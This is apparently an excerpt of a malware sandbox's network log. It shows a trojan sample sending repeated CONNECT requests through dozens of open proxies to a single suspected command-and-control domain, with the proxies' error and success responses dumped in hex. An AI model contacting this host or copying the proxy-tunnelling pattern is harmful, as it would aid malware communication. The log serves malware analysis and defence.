                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.695147038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.898237944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.289113998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                129192.168.2.850572199.229.254.12941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.153263092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                130192.168.2.85038291.108.130.111326505828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.165096998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.964462996 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                131192.168.2.84983392.204.136.149172705828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.165098906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.194906950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.195996046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.195205927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.194942951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:59.194694996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:11.212301970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                132192.168.2.85041641.139.147.8656785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.170332909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                133192.168.2.85032639.105.27.3031285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.184084892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.995780945 CET38INHTTP/1.1 200 OK
                                                                                content-length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                134192.168.2.850559193.239.58.9280815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.184645891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                135192.168.2.850337210.211.113.34805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.186825991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                136192.168.2.850383103.14.224.10431285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.190886021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.882225990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.741635084 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                137192.168.2.850709103.18.46.2534435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.197305918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                138192.168.2.850713103.18.46.2534435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.200052023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                139192.168.2.850718103.18.46.2534435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.202063084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                140192.168.2.850723103.18.46.2534435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.207251072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                141192.168.2.850623104.23.100.73805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.207623959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.295484066 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                142192.168.2.850632185.162.228.128805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.213644981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.301562071 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                143192.168.2.850562201.91.82.15531285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.213948011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.741653919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.413496971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.788727045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.704083920 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                144192.168.2.850642188.114.99.171805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.220462084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.308931112 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                145192.168.2.850647104.21.64.208805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.223794937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.311723948 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                146192.168.2.850648172.67.182.38805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.223890066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.313462973 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                147192.168.2.849874141.148.63.29805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.226125002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.382270098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382989883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.383131027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.382406950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:59.397891998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:04.307056904 CET839INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:29:04 GMT
                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                Content-Length: 647
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 63 6c 69 6e 74 61 6c 65 78 61 6e 64 65 72 34 40 68 6f 74 6d 61 69 6c 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at clintalexander4@hotmail.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                148192.168.2.85059113.37.59.9931285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.226649046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.394805908 CET146INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: PHP/5.4.7
                                                                                Server: squid/4.10
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                149192.168.2.850590107.181.141.7064675828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.228873014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.474392891 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                Proxy-Connection: close
                                                                                X-Webshare-Error: 407
                                                                                X-Webshare-Reason: invalidpassword
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Length: 121
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Connection: close
                                                                                Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                150192.168.2.850438156.67.217.159805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.229108095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.913500071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.241667032 CET327INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                151192.168.2.850397103.169.130.1780805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.235740900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.979407072 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                152192.168.2.8506565.161.98.204112325828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.235970974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.538471937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.851028919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.460536003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
